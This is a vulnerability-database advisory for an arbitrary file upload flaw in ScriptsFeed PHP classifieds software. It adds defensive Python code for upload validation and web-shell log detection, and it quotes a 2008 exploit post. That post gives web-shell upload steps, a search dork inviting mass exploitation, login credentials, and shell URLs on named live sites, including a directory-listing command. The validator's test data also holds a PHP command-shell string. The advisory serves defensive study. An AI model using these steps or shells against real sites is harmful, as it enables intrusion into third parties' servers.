ScriptsFeed Realtor Classifieds System Arbitrary File Upload Vulnerability

Vulnerability ID: 1116738
Type: Input validation
Published: 2008-11-13
Updated: 2009-08-12
CVE: CVE-2008-6942
CNNVD ID: CNNVD-200908-108
Platform: PHP
CVSS score: 6.5
|Sources
https://www.exploit-db.com/exploits/7112
https://cxsecurity.com/issue/WLB-2009080107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-108
|Details
Unrestricted file upload vulnerability in ScriptsFeed Realtor Classifieds System (also known as Real Estate Classifieds). A remote authenticated user can upload a file with an executable extension (for example a PHP script) as a logo image and then execute arbitrary code by requesting the stored file directly under classifieds1/yellow_images/. The application keeps the client-supplied extension and writes the upload into a directory the web server serves, so a single GET to the resulting URL runs the script.
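The flaw above comes down to two decisions in the upload handler: the stored filename keeps whatever extension the client sent, and the directory it is written to is one the web server executes PHP from. The following is an added example (not the vendor's code, and written in Python rather than the application's PHP so it runs stand-alone; the checks translate one-to-one) that shows the naming scheme the exploit's shell path implies beside a hardened version. The `vulnerable_dest` reconstruction of a time()-plus-original-name scheme is an assumption drawn from the `pictures/1226598339c.php` path in the exploit below, not from the application source.

```python
import os
import secrets

# Allowlist of image extensions and the leading bytes a file of that type must have.
ALLOWED_IMAGE_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def vulnerable_dest(upload_dir, original_name, now):
    """Destination the advisory implies the application used. This is an
    assumption reconstructed from the 'pictures/<timestamp>c.php' shell path
    in the exploit, not the vendor's source: a time() prefix glued to the
    client-supplied name, inside a directory the web server executes PHP
    from. A name ending in .php is kept verbatim, so the upload is a web shell.
    """
    return os.path.join(upload_dir, f"{now}{original_name}")


def hardened_dest(upload_dir, original_name, data):
    """Return a safe destination path for an uploaded image, or raise.

    Three independent controls, each of which alone breaks the attack path
    described in the advisory:
      1. the extension must be on an allowlist (never a denylist of .php etc.);
      2. the file's leading bytes must match that extension;
      3. the stored name is generated server-side, so nothing from the
         client-supplied name (path separators, double extensions,
         .htaccess) survives into the filesystem.
    Serving upload_dir with PHP execution disabled is a fourth control that
    belongs in the web server configuration, not in application code.
    """
    if not data:
        raise UploadRejected("empty upload")
    # Only the final extension is consulted for the allowlist; 'php', 'phtml',
    # 'php5', 'htaccess' and a missing extension are all rejected here.
    ext = original_name.rsplit(".", 1)[-1].lower() if "." in original_name else ""
    magics = ALLOWED_IMAGE_TYPES.get(ext)
    if magics is None:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    if not any(data.startswith(m) for m in magics):
        raise UploadRejected(f"content does not look like a .{ext} image")
    # Random server-side name; the client's name is discarded entirely.
    return os.path.join(upload_dir, f"{secrets.token_hex(16)}.{ext}")


def upload_allowed(original_name, data):
    """True if hardened_dest would accept the file (nothing is written)."""
    try:
        hardened_dest("/tmp", original_name, data)  # hypothetical directory
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    shell = b"<?php system($_GET['cmd']); ?>"
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    print("vulnerable:", vulnerable_dest("/var/www/pictures", "c.php", 1226598339))
    for name, body in [("c.php", shell), ("shell.php.jpg", shell),
                       (".htaccess", b"AddType application/x-httpd-php .jpg"),
                       ("photo.JPG", jpeg)]:
        print(f"{name:16} allowed={upload_allowed(name, body)}")
```

Extension allowlisting alone is not sufficient on Apache hosts where mod_mime interprets every extension in a multi-dotted name (`shell.php.jpg`), which is why the client-supplied name is discarded rather than sanitised; and none of this replaces disabling script execution in the upload directory, for example with `php_flag engine off` or `RemoveHandler .php` in that directory's configuration.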
|Exploit
Note that the exploit reproduced below targets the vendor's Recipes Listing Portal rather than the Realtor Classifieds product itself; the attack path it walks through (upload a .php file as a picture, then request it from the upload directory) is the one described above, with uploads landing under pictures/ instead of classifieds1/yellow_images/.
[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id="  ( there are lots of sites, exploit them : ) )
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/pictures/[id]your_shell.php

Register on the site:

register: http://localhost/script/register.php

Then log in to the site:

login: http://localhost/script/login.php

Then click "Add a Recipe" and add a recipe.

Then click "View your Recipes", click your recipe, and it opens in a new page.

Right-click your photo, select Properties, and copy the photo link.

Paste it into your browser and go to your shell.

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



rfu for the demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2: 

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? ( don't index it right away, poke around the server )

example:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( the sites on the server )


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]
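Successful exploitation leaves a distinctive trace in the web server access log: a request for a `.php` (or similar) file inside a directory that should only ever serve images, such as `pictures/` in the post above or `classifieds1/yellow_images/` in the classifieds product. The following is an added example (not part of the original post) that parses Apache combined-format log lines and flags such requests, including percent-encoded and double-extension variants. The sample log lines are constructed for the demonstration; the third one is modelled on the `act=ls&d=...` request shown above, and the IP addresses are documentation ranges.

```python
import re
from urllib.parse import unquote, urlsplit

# Directories the application should only ever serve images from (assumption
# based on the paths in the advisory and the exploit post).
UPLOAD_DIRS = ("/pictures/", "/yellow_images/")
# Extensions that mod_php or a similar handler would execute.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Apache combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log, not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Nov/2008:18:25:39 +0000] "GET /script/pictures/1226598339photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Nov/2008:18:26:02 +0000] "GET /script/pictures/1226598339c.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Nov/2008:18:27:11 +0000] "GET /script/pictures/1226598339c.php?act=ls&d=%2Fetc%2Fvdomainaliases HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Nov/2008:19:01:44 +0000] "GET /classifieds1/yellow_images/logo.php HTTP/1.1" 404 312 "-" "curl/7.18"
198.51.100.7 - - [13/Nov/2008:19:02:10 +0000] "GET /classifieds1/yellow_images/1226601730logo.php.jpg HTTP/1.1" 200 77 "-" "curl/7.18"
192.0.2.9 - - [13/Nov/2008:19:05:00 +0000] "GET /script/recipedetail.php?id=12 HTTP/1.1" 200 9033 "-" "Mozilla/5.0"
"""


def decoded_path(target):
    """Strip the query string and percent-decode the path, so that
    '/pictures/x%2Ephp' is examined as '/pictures/x.php'."""
    return unquote(urlsplit(target).path)


def is_script_request(target):
    """True if the request path is inside an upload directory and any
    extension component of the basename is a script extension. Checking
    every dotted component (not just the last) catches 'shell.php.jpg',
    which Apache's mod_mime may still hand to the PHP handler."""
    path = decoded_path(target)
    if not any(d in path for d in UPLOAD_DIRS):
        return False
    exts = path.rsplit("/", 1)[-1].lower().split(".")[1:]
    return any(e in SCRIPT_EXTS for e in exts)


def find_webshell_hits(lines):
    """Return (client ip, status, decoded path) for every log line that
    requests a script inside an upload directory. A 404 is still worth
    keeping: it is an attempt against a path that does not exist yet."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_script_request(m["target"]):
            hits.append((m["ip"], m["status"], decoded_path(m["target"])))
    return hits


if __name__ == "__main__":
    for ip, status, path in find_webshell_hits(SAMPLE_LOG.splitlines()):
        print(f"{ip:14} {status} {path}")
```

In a real investigation the hit list is the starting point, not the verdict: pair each flagged path with the upload that created it (the POST from the same account shortly before the first GET) and with the file still on disk, since the timestamp prefix in the name tells you roughly when it was written.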
|References

Source: XF
Name: realtorclassifiedssystem-image-file-upload(46609)
Link: http://xforce.iss.net/xforce/xfdb/46609

Source: BID
Name: 32293
Link: http://www.securityfocus.com/bid/32293

Source: MILW0RM
Name: 7110
Link: http://www.milw0rm.com/exploits/7110

Source: SECUNIA
Name: 32690
Link: http://secunia.com/advisories/32690

Source: OSVDB
Name: 49960
Link: http://osvdb.org/49960